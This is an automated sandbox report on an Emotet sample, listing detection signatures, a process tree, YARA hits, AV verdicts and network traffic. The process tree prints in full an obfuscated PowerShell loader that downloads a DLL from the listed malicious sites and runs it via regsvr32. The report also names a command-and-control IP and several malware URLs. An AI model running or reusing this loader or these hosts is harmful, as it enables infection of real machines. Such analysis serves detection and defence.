Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report

Overview

General Information

Analysis ID:631940
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Changes security center settings (notifications, updates, antivirus, firewall)
Suspicious powershell command line found
Suspicious command line found
Powershell drops PE file
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cmd.exe (PID: 6320 cmdline: cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6408 cmdline: powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • regsvr32.exe (PID: 6696 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP MD5: 426E7499F6A7346F0410DEAD0805586B)
        • regsvr32.exe (PID: 6680 cmdline: C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP MD5: D78B75FC68247E8A63ACBA846182740E)
          • regsvr32.exe (PID: 3572 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • svchost.exe (PID: 6912 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6960 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7008 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7072 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7140 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1128 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5992 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6032 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 1912 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6640 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6968 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5632 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000010.00000002.323155942.00000000028C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000011.00000002.505000054.0000000000C60000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          Process Memory Space: powershell.exe PID: 6408INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xac2a:$b2: ::FromBase64String(
          • 0x1cedd:$b2: ::FromBase64String(
          • 0x5eeeb:$b2: ::FromBase64String(
          • 0x640d0:$b2: ::FromBase64String(
          • 0x6442b:$b2: ::FromBase64String(
          • 0x73a44:$b2: ::FromBase64String(
          • 0x73da4:$b2: ::FromBase64String(
          • 0x75f6b:$b2: ::FromBase64String(
          • 0x7c36e:$b2: ::FromBase64String(
          • 0x7c6cb:$b2: ::FromBase64String(
          • 0x7cc2e:$b2: ::FromBase64String(
          • 0x7d12b:$b2: ::FromBase64String(
          • 0x7df55:$b2: ::FromBase64String(
          • 0x7e2b2:$b2: ::FromBase64String(
          • 0x7eaf0:$b2: ::FromBase64String(
          • 0x7f1c7:$b2: ::FromBase64String(
          • 0x7fe4f:$b2: ::FromBase64String(
          • 0x80371:$b2: ::FromBase64String(
          • 0x88623:$b2: ::FromBase64String(
          • 0xae908:$b2: ::FromBase64String(
          • 0xaea11:$b2: ::FromBase64String(
          SourceRuleDescriptionAuthorStrings
          16.2.regsvr32.exe.28c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            17.2.regsvr32.exe.c60000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              17.2.regsvr32.exe.c60000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                16.2.regsvr32.exe.28c0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://173.82.82.196:8080/temVAvira URL Cloud: Label: malware
                  Source: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/Avira URL Cloud: Label: malware
                  Source: https://173.82.82.196:8080/lAvira URL Cloud: Label: malware
                  Source: http://digitalkitchen.jp/images/PVn/Avira URL Cloud: Label: malware
                  Source: https://173.82.82.196/URL Reputation: Label: malware
                  Source: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/Avira URL Cloud: Label: malware
                  Source: https://173.82.82.196:8080/URL Reputation: Label: malware
                  Source: http://piffl.com/piffl.com/a/Avira URL Cloud: Label: malware
                  Source: https://nakharinitwebhosting.com/HSDYKN1X5GLF/Avira URL Cloud: Label: malware
                  Source: https://173.82.82.196:8080/PAvira URL Cloud: Label: malware
                  Source: jsonsintl.comVirustotal: Detection: 5%Perma Link
                  Source: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/Virustotal: Detection: 14%Perma Link
                  Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPReversingLabs: Detection: 40%
                  Source: C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy)ReversingLabs: Detection: 40%
                  Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJoe Sandbox ML: detected
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,

                  Networking

                  barindex
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080
                  Source: Joe Sandbox ViewASN Name: MULTA-ASN1US MULTA-ASN1US
                  Source: Joe Sandbox ViewASN Name: DIMENOCUS DIMENOCUS
                  Source: Joe Sandbox ViewIP Address: 173.82.82.196 173.82.82.196
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 02:12:15 GMTServer: ApacheX-Powered-By: PHP/5.6.40Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 02:12:15 GMTContent-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"Content-Transfer-Encoding: binarySet-Cookie: 628aed7f4404a=1653271935; expires=Mon, 23-May-2022 02:13:15 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 02:12:15 GMTContent-Length: 365056Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=40Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhk
                  Source: global trafficHTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive
                  Source: global trafficTCP traffic: 192.168.2.3:49752 -> 173.82.82.196:8080
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                  Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","P equals www.facebook.com (Facebook)
                  Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","P equals www.twitter.com (Twitter)
                  Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                  Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                  Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmentarz.5v.pl/themes/zalMkTb/
                  Source: regsvr32.exe, 00000011.00000003.390757486.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504419422.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.506488059.0000025912489000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436767944.0000019AC6500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.505950785.0000021041500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: svchost.exe, 00000013.00000002.506283732.000002591240E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436767944.0000019AC6500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: regsvr32.exe, 00000011.00000003.391691578.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504289621.0000000000B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: regsvr32.exe, 00000011.00000003.390757486.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000003.382340670.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.505425880.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504419422.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000003.382007388.0000000002C91000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000003.382164868.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.17.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://digitalkitchen.jp/images/PVn/
                  Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                  Source: powershell.exe, 00000002.00000002.320823240.00000000051EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsonsintl.com
                  Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/
                  Source: powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://piffl.com/piffl.com/a/
